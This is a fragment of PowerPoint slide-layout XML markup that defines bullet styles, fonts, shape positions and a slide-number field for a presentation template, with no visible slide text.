                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="114300" lvl="7" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="114300" lvl="8" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>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56" name="Shape 56"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Shape 57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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58" name="Shape 58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="3977280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="114300" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="114300" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="114300" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="114300" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="114300" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="114300" lvl="5" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="114300" lvl="6" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="114300" lvl="7" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="114300" lvl="8" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Shape 59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5351927" y="6276001"/>
            <a:ext cx="1285453" cy="354563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr b="0" i="0" lang="ru-RU" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMap accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" bg1="lt1" bg2="dk2" tx1="dk1" tx2="lt2" folHlink="folHlink" hlink="hlink"/>
  <p:sldLayoutIdLst>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108" name="Shape 108"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Shape 109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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110" name="Shape 110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="3977280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="114300" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="114300" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="114300" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="114300" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="114300" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="114300" lvl="5" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="114300" lvl="6" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="114300" lvl="7" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="114300" lvl="8" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>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159" name="Shape 159"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Shape 160"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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161" name="Shape 161"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="3977280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="114300" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="114300" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="114300" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="114300" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="114300" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="114300" lvl="5" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="114300" lvl="6" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="114300" lvl="7" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="114300" lvl="8" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>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211" name="Shape 211"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Shape 212"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5321520" y="0"/>
            <a:ext cx="6856920" cy="6856920"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="545E64">
              <a:alpha val="9411"/>
            </a:srgbClr>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13" name="Shape 213"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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214" name="Shape 214"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="3977280"/>
